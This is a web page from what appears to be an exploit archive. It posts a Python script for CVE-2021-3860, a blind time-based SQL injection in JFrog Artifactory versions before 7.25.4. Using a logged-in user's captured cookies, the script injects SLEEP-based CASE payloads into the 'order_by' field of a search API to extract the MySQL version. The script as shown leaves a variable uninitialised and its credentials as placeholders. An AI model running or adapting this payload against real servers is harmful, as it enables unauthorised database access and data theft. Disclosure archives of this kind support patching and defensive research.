JFrog Artifactory SQL Injection

JFrog Artifactory SQL Injection: Posted Feb 19, 2024; Authored by ardr; JFrog Artifactory versions prior to 7.25.4 suffer from a remote blind SQL injection vulnerability.; tags | exploit, remote, sql injection; advisories | CVE-2021-3860; SHA-256 | 0dc96d8c4641266fce6becf3c5ad80a2e19a76708111b79b7cd09269f93269b7; Download | Favorite | View

JFrog Artifactory SQL Injection

# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date: 
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below


warnings.simplefilter('ignore',InsecureRequestWarning)


session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint 
pos = 1
# cookies = Replace this with captured cookies from the above endpoint 


while True:
    for i in string.digits + '.':
        data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
        start = time.time()
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
        if len(version) >= 6:
            stdout.write("\n")
            print(f"Version found: MySQL {version}")
            exit(0)

Top Authors In Last 30 Days

Red Hat 226 files
Ubuntu 86 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,374)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,287)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,660)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

JFrog Artifactory SQL Injection

JFrog Artifactory SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

JFrog Artifactory SQL Injection

Share This

JFrog Artifactory SQL Injection

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems